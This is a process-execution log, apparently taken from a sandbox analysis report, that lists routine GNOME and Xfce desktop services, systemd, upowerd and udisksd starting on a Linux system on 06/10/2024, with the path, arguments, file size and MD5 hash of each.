                                                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-rfkill
                                                                                                  Arguments:/usr/libexec/gsd-rfkill
                                                                                                  File size:51808 bytes
                                                                                                  MD5 hash:88a16a3c0aba1759358c06215ecfb5cc
                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                                                                  File size:35136 bytes
                                                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                                                                  File size:35136 bytes
                                                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-smartcard
                                                                                                  Arguments:/usr/libexec/gsd-smartcard
                                                                                                  File size:109152 bytes
                                                                                                  MD5 hash:ea1fbd7f62e4cd0331eae2ef754ee605

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                                                                  File size:35136 bytes
                                                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-datetime
                                                                                                  Arguments:/usr/libexec/gsd-datetime
                                                                                                  File size:76736 bytes
                                                                                                  MD5 hash:d80d39745740de37d6634d36e344d4bc
                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/upower/upowerd
                                                                                                  Arguments:/usr/lib/upower/upowerd
                                                                                                  File size:260328 bytes
                                                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-media-keys
                                                                                                  Arguments:/usr/libexec/gsd-media-keys
                                                                                                  File size:232936 bytes
                                                                                                  MD5 hash:a425448c135afb4b8bfd79cc0b6b74da

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-screensaver-proxy
                                                                                                  Arguments:/usr/libexec/gsd-screensaver-proxy
                                                                                                  File size:27232 bytes
                                                                                                  MD5 hash:77e309450c87dceee43f1a9e50cc0d02

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                                                                  File size:35136 bytes
                                                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                                                                  File size:35136 bytes
                                                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76
                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/xfce4-panel
                                                                                                  Arguments:-
                                                                                                  File size:375768 bytes
                                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/upower/upowerd
                                                                                                  Arguments:/usr/lib/upower/upowerd
                                                                                                  File size:260328 bytes
                                                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:07
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-power
                                                                                                  Arguments:/usr/libexec/gsd-power
                                                                                                  File size:88672 bytes
                                                                                                  MD5 hash:28b8e1b43c3e7f1db6741ea1ecd978b7
                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/udisks2/udisksd
                                                                                                  Arguments:-
                                                                                                  File size:483056 bytes
                                                                                                  MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/udisks2/udisksd
                                                                                                  Arguments:-
                                                                                                  File size:483056 bytes
                                                                                                  MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/dumpe2fs
                                                                                                  Arguments:dumpe2fs -h /dev/sda2
                                                                                                  File size:31112 bytes
                                                                                                  MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4